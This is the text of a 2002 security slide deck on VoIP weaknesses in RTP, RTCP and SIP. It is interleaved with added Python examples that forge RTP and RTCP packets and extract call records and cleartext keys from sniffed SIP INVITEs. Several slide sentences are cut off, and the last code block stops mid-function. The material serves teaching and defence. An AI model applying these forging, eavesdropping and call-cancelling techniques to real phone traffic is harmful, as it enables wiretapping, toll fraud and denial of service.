
VoIP

The Next Generation of Phreaking

Revision 1.1

Ofir Arkin
Managing Security Architect
©2002 @STAKE, INC.

Agenda

- Overview
- An Introduction to VoIP
- Challenges Facing VoIP and their Relation to Security
- Media Transport – Examining RTP, RTCP and Security
- Signaling – The Session Initiation Protocol as an Example
- "What is a call worth if you can't speak, Mr. Anderson?" – Examples with VoIP and Security

Overview

"...It is no longer necessary to have a separate network for voice..."

Because IP is the vessel for voice transmission, VoIP inherits the security problems that come with the Internet Protocol. The security hazards are even more complex because of the nature of speech (voice quality) and the other special conditions VoIP technology needs to meet in order to fulfill its promise as a new, emerging technology for carrying voice.

Overview
Some security issues arise from the media transport protocols (RTP, RTCP, SCTP) used to carry voice; some arise from the signaling protocols (SIP, H.323, MEGACO, MGCP) and their respective architectures (the placement of the "intelligence", for example); and others arise from the different components that make up a VoIP architecture. We will also examine supporting protocols, such as Quality of Service (QoS) protocols. Physical security is yet another source of concern.

VoIP has a wide range of deployment scenarios, and hence a wide range of security problems reflecting those scenarios.

A Definition of VoIP
We can define VoIP simply as "the transport of voice traffic using the Internet Protocol". Saying "using the Internet Protocol" makes many people think of the Internet. In fact, Internet Telephony is only a portion of VoIP, and VoIP has a broader definition. To remove any shred of doubt we define VoIP as "the transport of voice traffic using the Internet Protocol over any network".

Protocols Combining a VoIP Solution

Protocol Types:

- Signaling – protocols which establish, locate, set up, modify and tear down sessions.
- Media Transport – protocols which transmit the voice samples.
- Supporting (Services) – DNS, Location Servers, QoS, routing protocols, AAA...

Protocols Combining a VoIP Solution

[Figure: a SIP call set-up through two SIP proxies, with the numbered steps below.]

1. A request (SIP INVITE) is sent from the SIP IP Phone to its SIP Proxy to ESTABLISH a session.
2. The SIP Proxy sends a DNS query to the DNS Server for the IP address of the SIP Proxy of the destination domain.
3. The INVITE is forwarded to the SIP Proxy of the destination domain.
4. The Location Service is queried to check that the destination represents a valid registered device, and for its IP address.
5. The request is forwarded to the end device (the destination SIP IP Phone).
6. The destination device returns its IP address to the originating device.
7. A media connection (Media Transport) is opened between the two phones.

Examples of Protocols Combining a VoIP Solution – It is a Zoo Station

Signaling
- SIP (IETF)
- H.323 (ITU-T)
- MGCP (IETF)
- MEGACO (IETF / ITU-T H.248)

Media Transport
- RTP and RTCP (IETF)
- SCTP (IETF)

Supporting Services
- DNS
- Routing – TRIP (Telephony Routing over IP)
- Quality of Service – RSVP, 802.1Q (802.1p priority tagging)

Why Replace the Current Telephony Infrastructure? – A Carrier Perspective

Two separate reasons:
- Technology is advancing: circuit switching is not suitable for carrying anything other than voice; it does not qualify as a suitable technology for the new world of multimedia communications (video, email, instant messaging, the World Wide Web, etc.). Traditional telephony cannot provide, for example, the types of features needed by a contemporary business in the advancing age of e-commerce.
- The $ factor

Subscribers would still like to use the telephone for making and receiving phone calls, but they would also like the ability to use the telephone to interact easily with other applications and to easily use new services.

Why IP? Carrier Perspective – Lower Equipment Costs

Traditional Telephony:

- Proprietary hardware, application software and operating system when purchasing a telephony switch.
- One vendor usually supplies the entire equipment for the whole network.
- The vendor also supplies training, support and future development for its equipment. This binds the operator to the supplier for a long term, since it is not cost effective to replace the equipment. It also limits the opportunities for 3rd parties to develop new software applications for these systems.

Why IP? Carrier Perspective – Lower Equipment Costs

IP:

- In the IP world most of the equipment is standard, mass-produced computer equipment. This offers great flexibility for the purchasing party: one company can supply the hardware, another the operating system, and another can develop special features. Several companies can be hired to supply different systems for the network.
- Because of the distributed client-server architecture of IP, operators have the ability to start small and grow.

Why IP? Carrier Perspective – Lower Bandwidth Requirements

Unlike traditional telephony, which is limited to the ITU recommendation G.711 codec and therefore transports voice at 64kbps, VoIP can use other, more sophisticated coding algorithms that enable speech to be transmitted at rates such as 32kbps, 16kbps, 8kbps, 6.3kbps, or even 5.3kbps. Some VoIP protocols are also able to negotiate an accepted coder scheme, enabling the use of more than one coder scheme and the ability to introduce new coders in the future. Taking into account that a large portion of a carrier's operational costs is its transmission capacity, VoIP can significantly reduce bandwidth requirements to as little as one-eighth

Why IP? Carrier Perspective

- More business opportunities and revenue potential
- "Show me the money Jerry!"
- Introducing new services to telephony subscribers
- The time-to-market of new services
- New technology brings newcomers to the market (good?)
- Integrating voice and data applications

Why IP? User Perspective – Corporate Users

One of the fastest growing markets for VoIP is the enterprise LAN. More and more enterprise LANs are carrying voice, video and data.

More and more large organizations, especially in North America, are using IP-based dedicated leased lines between different branches of the company to carry not only data but voice and video. In this way these companies save the cost of long distance calls over traditional telephony. The leased lines can also be used for video conferencing and for other purposes that bring significant cost savings to an organization.

Why IP? User Perspective - Consumers


Consumers might have several other reasons for using IP to carry voice than a carrier-grade telephony operator or a corporate user.

Lower Bandwidth Requirement – VoIP can use several sophisticated coding algorithms that enable speech to be transmitted at rates such as 32kbps, 16kbps, 8kbps, 6.3kbps, or even 5.3kbps. VoIP protocols are able to negotiate an accepted codec, enabling the use of more than one coder scheme and the ability to introduce new codecs in the future. These abilities give the end user the ability to use the Internet and VoIP technology to hold voice conversations with any other PC user connected to the Internet. This is also one of the uses of Internet Telephony.

Why IP? User Perspective - Consumers


Significant Cost Savings – For consumers the introduction of VoIP not only brings more value-added services when they use their telephone. It also brings the opportunity for significant savings in the cost of phone calls. Today consumers can use an ordinary telephone to connect to an Internet Telephony Service Provider (ITSP).

The ITSP uses IP to provide low cost voice/fax connections through combinations of the Internet, leased lines, and the PSTN. All the ITSP has to do is use equipment to convert the voice to data, transport the data, and convert it back to voice. The cost reduction for the ITSP comes from the use of the Internet as the voice transport vessel. The ITSP does not have to build a full blown telephony

Why IP? User Perspective - Consumers

ITSPs also connect PC users to traditional telephony users. Here the cost savings are even more considerable, both for the ITSP and for the consumer (the ITSP is not required to pay for interconnect on the user side). Using such an ITSP service can reduce phone call costs considerably.

For example, on calls made from the United Kingdom to Israel, instead of paying 1.7 GBP per minute with traditional telephony one pays only 0.055 GBP per minute when using an ITSP.

Challenges Facing VoIP

- Speech Quality
  - Delay/Latency
  - Jitter
  - Packet Loss
  - Speech Coding Techniques
- Network Availability, Reliability and Scalability [Carrier]
- Managing Access and Prioritizing Traffic [Carrier]
- Security [All]

Problems Facing VoIP – Speech Quality

Speech quality is affected by many different technical attributes: the codec used, system latency, jitter, packet loss, and others.

Usually the codec chosen will be an industry standard. Therefore latency becomes one of the most important attributes affecting voice quality.

Problems Facing VoIP – Speech Quality

Latency/Delay
With VoIP we define latency as the interval it takes speech to exit the speaker's mouth and reach the listener's ear. This is also known as "one-way latency" or "mouth-to-ear latency". Latency is typically measured in milliseconds. The sum of the two one-way latency figures is known as the round-trip latency. ITU-T recommendation G.114 specifies that in order to have good voice quality the round-trip delay should not exceed 300ms.

Problems Facing VoIP – Speech Quality

We can name several sources of delay with VoIP that are inherited from the use of IP-based networks:

- Packetization/Voice Coding and Transmission Delay – the time it takes to pack and send a voice sample.
- Handling Delay – the time it takes to process a packet.
- Queuing Delay – the time a packet spends queued.
- Convergence Delay – the time it takes to convert VoIP traffic to its PSTN equivalent and vice versa.

Problems Facing VoIP – Speech Quality: Jitter

We can define jitter as delay variation. If we experience a delay in a conversation there are methods to compensate for it, provided the delay is not too big. If the delay varies, then compensating for it becomes a harder task.

Problems Facing VoIP – Speech Quality: Packet Loss

In order to have high speech quality we need little to none of the speech samples transmitted from the speaker to the listener to be lost. However, with data networks packet loss is expected and common. One of many reasons might be a congested network.

With voice, we cannot use traditional retransmission mechanisms when packets are lost, since voice is delay sensitive. These retransmission mechanisms would introduce additional latency (UDP vs. TCP): time is needed to determine that a packet was lost, and time is needed to retransmit the missing packet.

With VoIP we can suffer packet loss up to 5% of the

Problems Facing VoIP – Speech Quality: Packet Loss

Packet loss may affect codecs differently, since codecs compress the audio data in different ways. A codec which does little compression loses a smaller portion of the audio per lost packet than a codec which uses an advanced compression scheme to use less bandwidth. Therefore the effect on voice quality will also be different.

Another problem is the out-of-sequence arrival of packets carrying voice samples. We need to ensure that speech is received at the other end as transmitted. Otherwise packets will be presented to the listener out of order, or discarded...

A way to deal with some of these problems is the

Problems Facing VoIP – Speech Quality: Speech Coding Techniques

If speech sounds synthetic, the latency prevention, bandwidth reduction and packet loss minimization techniques will be useless. The speech coding technique selected should reduce bandwidth while still maintaining good speech quality. As a rough statement, the lower the bandwidth requirements of a codec, the lower the voice quality produced. Also, better voice quality usually means a more complex algorithm, and therefore more processing power is needed.

This does not mean that there are no codecs which produce good speech quality without high bandwidth requirements.

Voice Quality with Internet Telephony

With Internet Telephony voice quality issues are the most problematic to overcome. The problem is that the Internet is not a network where one can prioritize traffic or reserve bandwidth. Packet loss, congestion, delays, and reliability are other sources of trouble for voice quality, which add to the overall problem of voice quality with Internet Telephony.

We must not forget that on the Internet, which is a packet switched network, packets may take different routes to a destination. This means that voice samples may arrive

Problems Facing VoIP – Network Availability, Reliability and Scalability

Carrier-grade telephony networks are available 99.999% of the time. This means a downtime of only about 5 minutes per year. Carrier-grade telephone operators who wish to rely on VoIP technology to offer telephony services are required to have the service available exactly as it is today: 99.999% of the time. Every time you wish to use your VoIP-based telephony service you must get service when picking up the handset (a dial tone and the ability to complete a call).

The VoIP core network is required to be resilient and redundant. For other parts of the network it depends on the network architecture and infrastructure. There are numerous availability problems at the edge of the network. These problems relate to the way the

Problems Facing VoIP – Network Availability, Reliability and Scalability

A carrier-grade VoIP network is required to be scalable and to support hundreds of thousands of concurrent connections/calls, as circuit-switched telephony networks do today. A VoIP-based network also needs to maintain the ability to grow with demand. As mentioned in previous sections, a VoIP-based network is able to start small and expand as demand for bandwidth and service increases.

[Figure: customer premises equipment. A POTS telephone, a fax and a modem connect over a/b lines to a gateway; the gateway and a PC connect over 100BaseT to an IP switch.]


Problems Facing VoIP – Managing Access and Prioritizing Traffic

With VoIP-based networks voice, data, and video share the same network. Voice and data have their own quality requirements, and must not be treated the same way within the network.

Bandwidth must be reserved for voice, so that whenever a subscriber wishes to place a call he will be able to do so and the appropriate bandwidth will be assigned to the call. If large data transfers occur at the same time, priority must be given to the voice traffic over the data traffic, so that voice traffic is not queued behind it, which would cause latency and packet loss. This means that the most critical traffic, voice, will not be affected by a congested network.

In order to be able to prioritize traffic and reserve bandwidth VoIP based networks will have to use

Problems Facing VoIP – Security

The wide availability of IP not only contributes to the widespread adoption of VoIP technology; it also brings the security hazards along with it.

The fact that data and voice share the same network is the root of some of the security problems associated with VoIP. Because IP is the vessel for voice transmission, VoIP inherits the security problems that come with the Internet Protocol. The security hazards are even more complex because of the nature of speech within VoIP networks, and other special conditions VoIP needs to meet. We can mention resource starvation attacks, session hijacks, and

Problems Facing VoIP – Security

Old school security problems are not the only security problems VoIP is facing. Some security issues arise from the media transport protocols used to carry voice, some from the signaling protocols and their respective architectures (the placement of the "intelligence", for example), and others from the different components that make up a VoIP architecture. Even supporting protocols, such as quality of service protocols, have their security issues. Physical security is yet another source of concern.

Problems Facing VoIP – Security

We must not forget another major factor: signaling and voice share the same networks. Because most VoIP signaling protocols run in-band, another avenue for trouble is opened.

VoIP has a wide range of deployment scenarios, hence a wide range of security problems reflecting those scenarios.

Problems Facing VoIP – Security


Another concern with VoIP-based networks is that an end user not only has the ability to place a call and interact with his own switch, but can interact with other parts of the infrastructure as well. This includes other networking devices that make up the network, the protocols being used (whether media transport or signaling protocols), the TCP/IP protocol suite, etc.

Some VoIP protocols give an end user even broader options to interact with the network, not only through features, but also because the intelligence is at the edge (the telephone itself).

These risks endanger network availability and voice quality, not to mention other issues such as fraud and phreaking.

There are a lot of constraints a carrier grade VoIP based

VoIP Security – What is at stake?

Everything...

- From IP phones to core routers, through media gateways, SIP proxies, gatekeepers, location servers, routers, switches, VoIP-aware firewalls...
- Any equipment making up a VoIP infrastructure of some sort.
- Any protocol used, whether a signaling protocol (SIP, H.323, MEGACO, MGCP) or one used to carry the voice samples (RTP, RTCP). Taking advantage of the protocols themselves is, in my opinion, the name of the game.
- Any TCP/IP protocol used

VoIP Security – Physical Security

With a 4th generation carrier the last mile is the main concern:

- The main concern is access to the physical wire (and to equipment). If achieved, all is downhill from there (this holds true for any architecture using VoIP as well).
- Equipment is likely to be stolen: routers and switches are nice decorations for a room.
- Physical tampering – "Cut the cord Luke"

VoIP Security – Physical Security


[Figure: voice packet shaping for QoS (DiffServ). Data and voice traffic from the subscriber are shaped separately; an attacker inserts his own hub ("My Hub (is your Hub)") on the wire.]

Bypassing simple packet shaping mechanisms.
Getting into the Voice VLAN: End-of-Game.

VoIP Security – Physical Security


[Figure: two topologies. Top: a PC and an IP Phone connected over 100BaseT, with a 100BaseT hub inserted between the switch and the IP Phone. Bottom: a PC and an IP Phone connected over 100BaseT through two switches, with the tap between the two switches.]

Eavesdropping can be done easily if there is access to the wire, with no specialized equipment other than a hub, a knife, and a clipper:
- Between the IP Phone (or Customer Premises Gateway) and the switch
- Between two switches

In both scenarios we bypassed any QoS mechanism used.

VoIP Security – Physical Security


Free Phone Calls

[Figure: the attacker sits between the IP Phone and the switch. Towards the switch he announces "I am representing the physical address of the IP Phone"; towards the phone he announces "I am representing the physical address of the Switch".]

An "advantage" over phreaking of this sort: the eavesdropper can also make free calls without the knowledge of the subscriber...

The Call-ID is used to differentiate between calls destined to the phreaker and calls destined to the owner of the line.

VoIP Security – Availability

- Availability & Redundancy
  - No electricity, no service. "G, here goes our carrier-grade availability..."
  - Costs of redundancy, and UPSs for every switch and router at the last mile...
- Denial-of-Service – even easier with VoIP, since you really do not need to be that smart or use too much traffic, but still you can cause outage in the

VoIP Security – Availability


To perform a denial-of-service you might use several avenues:

- Flood (G, what is new with that?)
- Abuse the protocols themselves – introduce denial-of-service conditions by taking advantage of the protocols used to do VoIP (examples later).

The type of devices one might target are, for example:

- IP Phones (easy)
- Routers, switches (depends on the equipment)
- Signaling gateways, media gateways, SIP proxies... (easy-medium)
- Any device in the path a call takes from a

Media Transport – RTP

[Figure: a voice packet on the wire: IP header (20 bytes: version, header length, type of service, total length, identification, flags, fragment offset, TTL, protocol, header checksum, source and destination IP address, options), UDP header (8 bytes: source port, destination port, UDP length, UDP checksum), followed by the RTP header.]

RTP header fields:

    V(2) P(1) X(1) CC(4) M(1) PT(7)   Sequence Number (16)
    Timestamp (32)
    SSRC (32)
    CSRC list (0..15 entries of 32 bits)

- Sequence Number – used by a receiver to detect packet loss (and also to restore packet sequence).
- Timestamp – indicates the instant at which the first byte in the RTP payload was generated. The timestamp is used to place RTP packets in the correct timing order.
- SSRC – identifies the source of an RTP stream.

Media Transport – RTP Security Issues

- Denial of Service
  - The way RTP handles SSRC collisions
    - Sending a command using the SSRC of another participant of a session. Result: the ability to drop users from a certain session.
    - Claiming the SSRC of a user. Result: transmission will stop, a new SSRC needs to be selected, and the transmission should resume.
- Why shut down when we can have some fun? Same SSRC, higher sequence number, higher timestamp. The fake content will be played before the real one. This means that from now on we
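The two RTP slides above describe the header fields and what an injected packet with a known SSRC and a jumped sequence number does to a receiver. The following Python is an added example and is not code from Arkin's deck: it builds and parses the fixed RTP header and models a minimal receiver that, like real jitter buffers, plays the newest packet per SSRC (by sequence number, modulo 2^16) and discards anything that arrives "behind" it. The packets are constructed inline; the SSRC, sequence numbers and payloads are arbitrary illustration values.

```python
import struct

def build_rtp(seq, ts, ssrc, payload, pt=0, marker=0):
    """Build a minimal RTP packet: V=2, no padding, no extension, no CSRC."""
    b0 = 2 << 6                  # version 2 in the top two bits
    b1 = (marker << 7) | pt      # marker bit + 7-bit payload type (0 = PCMU)
    return struct.pack("!BBHII", b0, b1, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + payload

def parse_rtp(data):
    """Parse the 12-byte fixed RTP header plus any CSRC list into a dict."""
    if len(data) < 12:
        raise ValueError("short RTP packet")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", data[:12])
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    cc = b0 & 0x0F
    hdr_len = 12 + 4 * cc
    csrcs = list(struct.unpack("!%dI" % cc, data[12:hdr_len])) if cc else []
    return {
        "version": 2, "padding": (b0 >> 5) & 1, "extension": (b0 >> 4) & 1,
        "cc": cc, "marker": b1 >> 7, "pt": b1 & 0x7F,
        "seq": seq, "timestamp": ts, "ssrc": ssrc, "csrc": csrcs,
        "payload": data[hdr_len:],
    }

class RtpReceiver:
    """Toy receiver: per SSRC, accept a packet only if its sequence number is
    ahead (mod 2^16) of the highest one accepted so far; anything older is
    treated as late or duplicate and dropped. Real jitter buffers are more
    forgiving about reordering, but share this 'newest wins' property, which
    is exactly what a forged packet with a jumped sequence number abuses."""
    def __init__(self):
        self.highest = {}    # ssrc -> highest sequence number accepted
        self.played = []     # (ssrc, seq, payload) handed to the decoder
        self.dropped = []    # (ssrc, seq, payload) discarded as stale

    @staticmethod
    def _newer(seq, ref):
        # RFC 3550 style comparison that survives 16-bit wrap-around
        return seq != ref and ((seq - ref) & 0xFFFF) < 0x8000

    def receive(self, data):
        p = parse_rtp(data)
        ssrc, seq = p["ssrc"], p["seq"]
        if ssrc not in self.highest or self._newer(seq, self.highest[ssrc]):
            self.highest[ssrc] = seq
            self.played.append((ssrc, seq, p["payload"]))
            return True
        self.dropped.append((ssrc, seq, p["payload"]))
        return False

def demo_injection():
    """Legitimate PCMU stream (20 ms frames, 160 timestamp units each) at
    sequence 1000 onwards; an attacker who sniffed the SSRC injects one packet
    with the same SSRC but a far higher sequence number and timestamp.
    Returns (payloads played, payloads dropped)."""
    rx = RtpReceiver()
    ssrc = 0xDEADBEEF                        # constructed value for the demo
    for i in range(3):
        rx.receive(build_rtp(1000 + i, 8000 + 160 * i, ssrc, b"real%d" % i))
    # forged packet: same SSRC, sequence jumped ahead by 500, timestamp to match
    rx.receive(build_rtp(1500, 8000 + 160 * 500, ssrc, b"FAKE"))
    # the legitimate sender's next packets now look stale and are discarded
    for i in range(3, 6):
        rx.receive(build_rtp(1000 + i, 8000 + 160 * i, ssrc, b"real%d" % i))
    return ([p for _, _, p in rx.played], [p for _, _, p in rx.dropped])
```

`demo_injection()` returns the forged payload in the played list and every later legitimate frame in the dropped list; the stream stays broken until the sender's sequence number catches up with the forged one, which is the "from now on" effect the slide alludes to.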

Media Transport – RTP Security Issues

- Dodge this – changing the audio encoding during a session. This can be used to tamper with voice quality, either by switching to a low quality codec or by switching to a higher quality codec that will jam the pipe.
- Encryption
  - DES – breakable (like other technologies and products...)
  - If SIP is used the DES key is sent in the clear in the SDP "k" parameter...

Media Transport – RTP Security Issues


Mix This You Foo (Tricking "Mixers" to mix whatever from wherever)

[Figure: two mixer scenarios. Left: links of different speeds (64kbps and 128kbps) connected to a conference through a mixer. Right: a mixer forwarding traffic from three sources at 64kbps each to one IP Phone, which is too much for it to handle.]

Media Transport – RTP Security Issues

- Changing the codec in the middle of a session sometimes happens automatically when the network suffers from congestion. Forging a voice codec change not only reduces voice quality; it might also introduce other problems such as denial-of-service, crashes of end systems, etc.
- Eavesdropping – since RTP identifies the codec being used, either statically (by payload type number) or through a "dynamic" payload type mapped in the SDP, it is easy to reconstruct the voice samples (even in real time).

Media Transport – RTCP Security Issues

- Forging Reception Reports
  - Reporting more packet loss – might lead an adaptive system to switch to a poor quality codec.
  - Reporting more jitter – might lead an adaptive system to switch to a poor quality codec.
- Denial of Service
  - RTCP "BYE", not in sync with the signaling protocol. The signaling protocol is not aware that
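To make the "forging reception reports" point concrete, here is an added Python example (not part of the original deck) that builds and parses an RTCP Receiver Report with one report block and feeds it to a toy adaptive-codec policy. The reporter and source SSRCs are the only things a third party needs, and both are visible in the RTP stream on the wire; nothing in the packet format authenticates who sent the report. The SSRCs, loss figures and the 10% / 100-unit thresholds are constructed values for the demo.

```python
import struct

RTCP_RR = 201   # RTCP packet type: Receiver Report

def build_rr(reporter_ssrc, source_ssrc, fraction_lost, cum_lost,
             ext_highest_seq, jitter, lsr=0, dlsr=0):
    """Build an RTCP Receiver Report (PT 201) with a single report block.
    fraction_lost is the 8-bit fixed-point value lost/expected * 256;
    cum_lost is the 24-bit cumulative number of packets lost."""
    if not 0 <= fraction_lost <= 255 or not 0 <= cum_lost < (1 << 24):
        raise ValueError("fraction_lost must fit 8 bits, cum_lost 24 bits")
    block = struct.pack("!IB3sIIII", source_ssrc, fraction_lost,
                        cum_lost.to_bytes(3, "big"), ext_highest_seq,
                        jitter, lsr, dlsr)
    body = struct.pack("!I", reporter_ssrc) + block
    # length field = number of 32-bit words in the packet minus one
    length = len(body) // 4
    header = struct.pack("!BBH", (2 << 6) | 1, RTCP_RR, length)   # V=2, P=0, RC=1
    return header + body

def parse_rr(data):
    """Parse an RTCP RR into a dict with one entry per report block."""
    b0, pt, length = struct.unpack("!BBH", data[:4])
    if b0 >> 6 != 2 or pt != RTCP_RR:
        raise ValueError("not an RTCP receiver report")
    if len(data) != 4 * (length + 1):
        raise ValueError("length field does not match packet size")
    rc = b0 & 0x1F
    reporter = struct.unpack("!I", data[4:8])[0]
    blocks, off = [], 8
    for _ in range(rc):
        src, fl, cum, ehs, jit, lsr, dlsr = struct.unpack("!IB3sIIII", data[off:off + 24])
        blocks.append({"source": src, "fraction_lost": fl / 256.0,
                       "cumulative_lost": int.from_bytes(cum, "big"),
                       "ext_highest_seq": ehs, "jitter": jit,
                       "lsr": lsr, "dlsr": dlsr})
        off += 24
    return {"reporter": reporter, "blocks": blocks}

def adaptive_codec(report, current="PCMU"):
    """Toy adaptive policy of the kind the slide targets: drop to a low-rate
    codec as soon as a receiver reports more than 10% loss or jitter above
    100 timestamp units. It trusts the report's SSRCs and nothing else."""
    for blk in report["blocks"]:
        if blk["fraction_lost"] > 0.10 or blk["jitter"] > 100:
            return "G.723.1"
    return current

def demo_forged_report():
    """An honest report for a healthy stream versus a forged one claiming 50%
    loss and heavy jitter. Returns the codec the policy picks in each case."""
    reporter, source = 0xAAAA0001, 0xDEADBEEF        # constructed SSRCs
    honest = build_rr(reporter, source, fraction_lost=2, cum_lost=3,
                      ext_highest_seq=1005, jitter=12)
    forged = build_rr(reporter, source, fraction_lost=128, cum_lost=500,
                      ext_highest_seq=1005, jitter=2000)
    return adaptive_codec(parse_rr(honest)), adaptive_codec(parse_rr(forged))
```

`demo_forged_report()` returns `("PCMU", "G.723.1")`: the same sender, hearing the forged report, downgrades the call even though the real receiver is perfectly happy.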

SIP (Session Initiation Protocol)

"The Session Initiation Protocol (SIP) is an application-layer control (signaling) protocol for creating, modifying and terminating sessions with one or more participants. These sessions include Internet multimedia conferences, Internet telephone calls and multimedia distribution. Members in a session can communicate via multicast or via a mesh of unicast relations, or a combination of these."

Taken from RFC 2543

SIP Design & Methods

- A client-server based protocol modeled after HTTP
- Building blocks are Requests and Responses (the client sends a Request, the server returns a Response)
- The methods are:
  - INVITE – session setup; initiates sessions. Re-INVITEs are used to change session state.
  - ACK – confirms an INVITE session
  - BYE – terminates a session
  - CANCEL – cancels a pending request
  - OPTIONS – capability and options query
  - REGISTER – binds an address to a location

SIP Components
SIP UAC – SIP User Agent Client

SIP UAS – SIP User Agent Server

UA – UAC + UAS

SIP Proxy – Relays the call signaling without maintaining state (although able to). Receives a request from a UA or another proxy server and forwards (proxies) the request to another location. (The ACK and BYE are not required to go through the SIP proxy server.)

SIP Redirect – Receives a request from a UA or a proxy. The redirect server returns a 3xy response stating the address the request should be sent to.

SIP Registrar – Receives registration requests and keeps the user's whereabouts using a Location Server.

SIP Response Codes

Characteristics similar to HTTP:

1xy Informational or Provisional (request in progress but not yet completed):
- 100 Trying
- 180 Ringing
- 181 Call Is Being Forwarded
2xy Success (the request has completed successfully):
- 200 OK
3xy Redirection (another location should be tried for the request):
- 300 Multiple Choices
- 301 Moved Permanently
- 302 Moved Temporarily

SIP Response Codes

4xy Client Error (the request was not completed due to an error in the request; can be retried at another location):
- 400 Bad Request
- 401 Unauthorized
- 482 Loop Detected
- 486 Busy Here
5xy Server Failure (the request was not completed due to an error in the recipient; can be retried at another location):
- 500 Server Internal Error
6xy Global Failure (the request failed and should not be retried anywhere):
- 600 Busy Everywhere

SIP Architecture
[Figure: SIP call flow between two SIP IP Phones through two SIP Proxies. The originating proxy sends a DNS query to the DNS Server for the IP address of the SIP Proxy of the destination domain; the destination proxy queries the Location Service to check that the destination is a valid registered device and to obtain its IP address.]

    Phone A -> Proxy A -> Proxy B -> Phone B :  INVITE (forwarded hop by hop)
    Phone B -> Proxy B -> Proxy A -> Phone A :  100 Trying, 180 Ringing, 200 OK
    Phone A -> Proxy A -> Proxy B -> Phone B :  ACK
    Phone A <-> Phone B                      :  RTP media, both ways
    Phone A -> Phone B                       :  BYE
    Phone B -> Phone A                       :  200 OK

SIP Security – INVITE Example


(Slide annotations: "Predicted Values", pointing at the From, To and Call-ID headers, and "Another hard to guess value", pointing at CSeq.)

INVITE sip:UserB@there.com SIP/2.0
Via: SIP/2.0/UDP here.com:5060
From: BigGuy <sip:UserA@here.com>
To: LittleGuy <sip:UserB@there.com>
Call-ID: 12345601@here.com
CSeq: 1 INVITE
Contact: <sip:UserA@100.101.102.103>
Content-Type: application/sdp
Content-Length: 147

v=0
o=UserA 2890844526 2890844526 IN IP4 here.com
s=Session SDP
c=IN IP4 100.101.102.103
t=0 0
m=audio 49172 RTP/AVP 0
a=rtpmap:0 PCMU/8000

SIP Security – Denial-of-Service

- Simple denial-of-service against SIP when using UDP: since UDP is connectionless (there is no connection state to validate an error against), if one can guess the target network a caller is sending its SIP signaling to over UDP, sending an ICMP error message such as Port Unreachable, Protocol Unreachable, Network Unreachable or even Host Unreachable will terminate the signaling and the call in any state.
- Using "CANCEL"s (see next 2 examples)
- Using "BYE" (anytime)

SIP Security – Denial-of-Service


A is not making calls

[Figure: A (SIP IP Phone) sends an INVITE towards B (SIP IP Phone); C (attacker) sends a CANCEL matching A's INVITE, so the call is never set up.]

"The CANCEL request cancels a pending request with the same Call-ID, To, From, and CSeq..."

SIP Security – Denial-of-Service


A is not receiving calls

[Figure: B (SIP IP Phone) sends an INVITE towards A (SIP IP Phone); C (attacker) sends a CANCEL matching B's INVITE, so A never receives the call.]

SIP Security – Call Tracking


Defined as logging the source and destination of all numbers being called.

Capturing the DTMF among all the other voice traffic one captures will sometimes give the eavesdropper more information, ranging from voice mail passwords (voicemail system number, mailbox number, and password) and calling card information to credit card information or any other data entered using DTMF.

With SIP we need to track the INVITE message. It contains the source and destination of the call. (With H.323 the H.225 call setup message which initiates a call has the call source and destination as part of the message.) You can also log the time of the call,

SIP Security – Call Tracking (Example)


INVITE sip:UserB@there.com SIP/2.0
Via: SIP/2.0/UDP here.com:5060
From: BigGuy <sip:UserA@here.com>
To: LittleGuy <sip:UserB@there.com>
Call-ID: 12345601@here.com
CSeq: 1 INVITE
Contact: <sip:UserA@100.101.102.103>
Content-Type: application/sdp
Content-Length: 147

v=0
o=UserA 2890844526 2890844526 IN IP4 here.com
s=Session SDP
c=IN IP4 100.101.102.103
t=0 0
m=audio 49172 RTP/AVP 0
a=rtpmap:0 PCMU/8000
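The INVITE above is the whole call-tracking record in one message, and the same headers are what the CANCEL attack two slides earlier has to copy. As an added example (not code from the deck), the following Python parses the slide's INVITE exactly as it would appear on the wire, extracts the call record an eavesdropper wants (who called whom, the Call-ID, where the RTP will flow and which codec), flags an SDP "k=" line if the session key is sent in the clear, and builds the CANCEL that matches the sniffed INVITE under the quoted rule (same Call-ID, To, From and CSeq number). The sample message is constructed from the slide; the CRLF line endings are the SIP wire format.

```python
import re

# Constructed sample: the INVITE shown on the slide, with CRLF line endings.
SAMPLE_INVITE = (
    "INVITE sip:UserB@there.com SIP/2.0\r\n"
    "Via: SIP/2.0/UDP here.com:5060\r\n"
    "From: BigGuy <sip:UserA@here.com>\r\n"
    "To: LittleGuy <sip:UserB@there.com>\r\n"
    "Call-ID: 12345601@here.com\r\n"
    "CSeq: 1 INVITE\r\n"
    "Contact: <sip:UserA@100.101.102.103>\r\n"
    "Content-Type: application/sdp\r\n"
    "Content-Length: 147\r\n"
    "\r\n"
    "v=0\r\n"
    "o=UserA 2890844526 2890844526 IN IP4 here.com\r\n"
    "s=Session SDP\r\n"
    "c=IN IP4 100.101.102.103\r\n"
    "t=0 0\r\n"
    "m=audio 49172 RTP/AVP 0\r\n"
    "a=rtpmap:0 PCMU/8000\r\n"
)

def parse_sip(raw):
    """Split a SIP request into request line, headers (lower-cased names,
    last value wins) and body, checking Content-Length against the body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers and int(headers["content-length"]) != len(body.encode()):
        raise ValueError("Content-Length does not match body size")
    return {"method": method, "uri": uri, "version": version,
            "headers": headers, "body": body}

def parse_sdp(body):
    """Pull out of the SDP what an eavesdropper cares about: where the media
    goes, which payload types are offered, and any key sent in the clear."""
    sdp = {"codecs": {}, "key": None}
    for line in body.split("\r\n"):
        if line.startswith("c="):
            sdp["conn_ip"] = line.split()[-1]
        elif line.startswith("m=audio"):
            parts = line.split()
            sdp["port"] = int(parts[1])
            sdp["payload_types"] = parts[3:]
        elif line.startswith("a=rtpmap:"):
            pt, name = line[len("a=rtpmap:"):].split(" ", 1)
            sdp["codecs"][pt] = name
        elif line.startswith("k="):           # session key in the clear
            sdp["key"] = line[2:]
    return sdp

def call_record(raw):
    """Call tracking: source, destination, Call-ID, media endpoint and codecs."""
    msg = parse_sip(raw)
    if msg["method"] != "INVITE":
        return None
    h, sdp = msg["headers"], parse_sdp(msg["body"])
    return {
        "from": re.search(r"<([^>]+)>", h["from"]).group(1),
        "to": re.search(r"<([^>]+)>", h["to"]).group(1),
        "call_id": h["call-id"],
        "media": (sdp.get("conn_ip"), sdp.get("port")),
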